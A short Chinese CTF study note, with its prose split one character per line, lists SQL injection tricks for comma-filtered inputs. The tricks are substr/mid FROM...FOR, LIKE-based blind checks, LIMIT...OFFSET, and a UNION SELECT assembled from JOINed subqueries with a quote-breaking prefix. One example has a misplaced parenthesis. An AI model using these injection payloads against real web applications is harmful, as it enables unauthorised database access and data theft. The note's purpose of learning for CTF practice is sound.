SQL
注
⼊
简
单
总
结
——
过
滤
逗
号
注
⼊
(
附
绕
过
tamper)
最
近
做
了
⼀
些
CTF
题
⽬
,
发
现
sql
题
⽬
很
喜
欢
出
过
滤
","
的
题
⽬
,
借
此
机
会
特
此
总
结
。
并
且
我
有
⼀个
想
法
能
够
通过
编
写
tamper
尽
量
多
的
解
决
sql
注
⼊
的
题
⽬
。
在
使
⽤
盲
注
的
时
候
,
需
要
使
⽤
到
substr(),mid(),limit
。
这
些
⼦
句
⽅
法
都
需
要
使
⽤
到
逗
号
。
对
于
substr()
和
mid()
这
两个
⽅
法
可
以
使
⽤
from to
的
⽅
式
来
解
决
:
select substr(database() from 1 for 1);
select mid(database() from 1 for 1);
union select 1,2 #
等
价于
union select * from (select 1)a join (select 2)b
select ascii(mid(user(),1,1))=80 #
等
价于
select user() like 'r%'
select * from news limit 0,1
#
等
价于
下
⾯
这
条
SQL
语
句
select * from news limit 1 offset 0
select * from table1 where id =1 and exists (select * from table2 where ord(substring(username from 1 for 1)=97);
127' UNION SELECT * FROM ((SELECT 1) JOIN (SELECT 2)b JOIN (SELECT 3) JOIN (SELECT 4)d JOIN (SELECT 5) )#